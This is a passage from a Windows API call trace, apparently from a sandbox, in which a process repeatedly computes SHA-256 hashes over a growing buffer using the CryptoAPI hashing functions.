	[0250.356] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0250.356] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.356] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0250.356] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778640, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778640, pdwDataLen=0x128c3c) returned 1
	[0250.356] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.356] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.356] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.356] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.356] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0250.356] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.356] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778258
	[0250.356] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778258, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778258, pdwDataLen=0x128c3c) returned 1
	[0250.356] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.356] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.356] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.357] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.357] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0250.357] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.357] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27787d0
	[0250.357] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27787d0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27787d0, pdwDataLen=0x128c3c) returned 1
	[0250.357] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.357] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.357] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.357] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.357] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0250.357] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.357] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777c90
	[0250.357] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2777c90, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2777c90, pdwDataLen=0x128c3c) returned 1
	[0250.357] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.357] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.357] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.358] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.358] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0250.358] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.358] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27781e0
	[0250.358] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27781e0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27781e0, pdwDataLen=0x128c3c) returned 1
	[0250.358] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.358] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.358] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.358] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.358] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0250.358] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.358] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777d30
	[0250.358] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2777d30, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2777d30, pdwDataLen=0x128c3c) returned 1
	[0250.358] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.358] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.358] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.359] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.359] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0250.359] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.359] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778848
	[0250.359] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778848, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778848, pdwDataLen=0x128c3c) returned 1
	[0250.359] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.359] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.359] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.359] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.359] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0250.359] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.359] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27787f8
	[0250.359] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27787f8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27787f8, pdwDataLen=0x128c3c) returned 1
	[0250.359] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.359] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.359] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.360] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.360] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0250.360] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.360] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27789d8
	[0250.360] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27789d8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27789d8, pdwDataLen=0x128c3c) returned 1
	[0250.360] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.360] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.360] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.360] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.360] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0250.360] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.360] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778af0
	[0250.360] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778af0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778af0, pdwDataLen=0x128c3c) returned 1
	[0250.360] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.360] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.360] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.361] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.361] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0250.361] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.361] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0250.361] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27783c0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27783c0, pdwDataLen=0x128c3c) returned 1
	[0250.361] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.361] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.361] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.361] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.361] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0250.361] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.361] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27786e0
	[0250.361] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27786e0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27786e0, pdwDataLen=0x128c3c) returned 1
	[0250.361] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.361] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.361] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.362] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.362] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0250.362] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.362] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778938
	[0250.362] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778938, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778938, pdwDataLen=0x128c3c) returned 1
	[0250.362] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.362] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.362] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.363] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.363] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0250.363] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.363] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27782f8
	[0250.363] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27782f8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27782f8, pdwDataLen=0x128c3c) returned 1
	[0250.363] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.363] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.363] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.363] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.363] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0250.363] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.363] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778d70
	[0250.363] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778d70, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778d70, pdwDataLen=0x128c3c) returned 1
	[0250.363] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.363] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.363] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.364] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.364] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0250.364] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.364] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b18
	[0250.364] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778b18, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778b18, pdwDataLen=0x128c3c) returned 1
	[0250.364] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.364] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.364] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.364] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.364] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0250.364] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.364] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778cf8
	[0250.364] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778cf8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778cf8, pdwDataLen=0x128c3c) returned 1
	[0250.364] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.364] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.364] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.365] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.365] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0250.365] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.365] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778190
	[0250.365] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778190, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778190, pdwDataLen=0x128c3c) returned 1
	[0250.365] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.365] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.365] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.365] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.365] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0250.366] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.366] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778898
	[0250.366] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778898, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778898, pdwDataLen=0x128c3c) returned 1
	[0250.366] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.366] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.366] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.366] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.366] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0250.366] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.366] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778de8
	[0250.366] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778de8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778de8, pdwDataLen=0x128c3c) returned 1
	[0250.366] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.366] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.366] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.366] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.367] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0250.367] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.367] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778ca8
	[0250.367] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778ca8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778ca8, pdwDataLen=0x128c3c) returned 1
	[0250.367] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.367] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.367] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.367] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.367] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0250.367] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.367] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783e8
	[0250.367] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27783e8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27783e8, pdwDataLen=0x128c3c) returned 1
	[0250.367] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.367] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.367] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.368] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.368] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0250.368] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.368] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777ce0
	[0250.368] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2777ce0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2777ce0, pdwDataLen=0x128c3c) returned 1
	[0250.368] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.368] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.368] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.368] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.368] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0250.368] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.368] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0250.368] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778230, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778230, pdwDataLen=0x128c3c) returned 1
	[0250.368] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.368] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.368] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.369] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.369] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0250.369] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.369] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778be0
	[0250.369] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778be0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778be0, pdwDataLen=0x128c3c) returned 1
	[0250.369] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.369] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.369] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.369] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.369] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x460, dwFlags=0x0) returned 1
